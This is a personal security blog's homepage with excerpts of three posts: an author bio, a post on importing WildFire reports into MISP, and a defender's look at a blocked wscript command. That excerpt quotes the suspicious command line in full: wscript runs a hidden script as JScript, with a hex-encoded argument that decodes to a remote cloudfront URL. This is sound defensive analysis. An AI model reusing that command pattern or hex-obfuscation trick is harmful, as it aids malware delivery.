Welcome to niem.es

Some musings on (mostly) security related topics.

Latest from the Blog


I’m a dedicated father and friend. I enjoy technology immensely and feel extremely lucky to have been born at the right place & during the right time. I started out working for the University of Dayton as a co-op student in computer science. I fell in love with the concept of networking – this was…

importing wildfire reports into misp and thehive

I’m experimenting with thehive and associated projects (misp in particular) and will be describing some issues I run into & how I’ve fixed them (fingers crossed). One of the first things I tried was to import events from wildfire to misp. I found a package called pan-stix and installed it on my osx box. Running…

Examining strange wscript behavior

We use cylance with script control, and periodically I review the outliers that have been blocked. I came across this one recently: wscript.exe “C:ProgramData{18E0DD83-92A2-5745-1464-C9078E2642C9}domo.txt” “68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e6574” “//B” “//E:jscript” “–IsErIk” I took a copy of the domo.txt script and uploaded to VT: I also ran that hex string through a hex decoder: 68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e = https://d274eq41c39r2n.cloudfront.net According to…

Get new content delivered directly to your inbox.